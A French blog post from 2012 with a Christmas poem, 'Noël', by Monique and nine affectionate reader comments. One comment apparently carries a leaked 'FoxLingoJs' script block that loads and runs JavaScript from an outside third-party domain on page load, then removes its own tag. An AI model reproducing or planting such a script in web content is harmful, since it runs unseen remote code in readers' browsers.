• ♥♥ Douceur de fête ♥♥

    NOEL

    Les sapins comme des soldats

    s’alignent dans la forêt

    verdoyante où apparaissent

    des arbres dénudés sans

    feuilles attendant avec

    impatience l’arrivée du

    printemps aux corbeilles

    pleines de fleurs bariolées

    mais les sapins qui ne

    blanchissent pas et qui ne

    perdent pas leur chevelure

    verte seront décorés dans

    des salons illuminés de

    boules argentées et dorées

    a la joie des enfants et des

    adultes a l’âme d’enfant

    dehors la neige peut tomber

    et illuminer le velours noir

    parsemé d’étoiles du ciel

    amicalement tendre tu

    entends les cloches sonnent

    Signalant que l’amitié et la

    paix ont vaincu l’obscurité

    écoute bien c’est Noël.

    ♥♥ Douceur de fête ♥♥

    Bisous doux

    Prénom Monique
     
     

  • Commentaires

    1
    Vendredi 21 Décembre 2012 à 22:19

    Bonsoir Monique,

    Mon petit tour pour te faire un ptit coucou,voilà un jolie petit billet,J'aime.!

    Pas beaucoup de monde en ce moment sur ekla,festivités obliges.

    Un gros bisous pour toi.

    Raymond.

    2
    Talhie Profil de Talhie
    Samedi 22 Décembre 2012 à 01:37

    COUCOU MA CHERIE QUE J AIME TU PASSES QUAND TU PEUX PAS DE SOUCIS JE PASSERAI AVANT NOEL TMMM GROS BISOUS

    3
    Samedi 22 Décembre 2012 à 08:20

    Bon samedi douce Monique

    moi je ne voudrai pas etre un sapin  ; tout les ans ont leur coupe le pied

     gros bisous  tendresse

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); // ]]></script>
    4
    Samedi 22 Décembre 2012 à 11:30

    Bonjour gentille Monique .

    Encore un tres beau texte que tu nous fait découvrir aujourd'hui !

    Je te souhaite un tres bon samedi .

    Gros bisous d'amitié .

    Daniel

    5
    Samedi 22 Décembre 2012 à 13:26

    **-.__.-**-.__.-**-..__.-**-.__.-**-.__.-**-..
    _.-**-.__.-**-.__.-**-.. Coucou Monique.....__.-**-.__.-**-.__.-**-.
    .__.-**- C'est avec une vague de tendresse.__.-**-.__
    .__.-**- Et un océan d'amitié.__.-**-.__
    _.-**- Que je viens déposer .__.-**-
    .-**-.**-.__.-**-._Ce petit message pour te souhaiter__.-**-.__
    ._.-**-.__.-**-.__.-**-.._une bonne journée, et bon week end__.-**-
    .__.-**-__.-**-.-**-.__.-**-.__amitié.-**-Lolli qui pense à toi.

    6
    Samedi 22 Décembre 2012 à 15:01

    COUCOU MONIQUE

    Je viens te souhaiter un bon week-end , désolé de n'être pas passé plus tôt j'ai eu une semaine très chargée . je te souhaite également de bonnes fêtes de NOËL .Avec toute mon amitié , bisous

    henry

    7
    Samedi 22 Décembre 2012 à 16:17

    Bonjour Monique. Ce matin, j'ai écrit un mini article car je suis allé chercher ma mère à Grenoble pour passer les fêtes avec nous. Bon week en, gros bisou .

    8
    Dimanche 23 Décembre 2012 à 13:08

    Bonjour Monique

    Je viens te remercier pour tes visites et tes messages si agréables à lire.

    Je te souhaite le plus merveilleux des dimanches avant Noël.
    J'espère que tu passeras d'agréables moments, et que ce week end restera dans ta mémoire un excellent souvenir.

    Amitié sincère de ton amie Lolli

    9
    Mardi 25 Décembre 2012 à 10:35

    Bonne journée de Noel petite Monique doux bisous

    Suivre le flux RSS des commentaires

    Vous devez être connecté pour commenter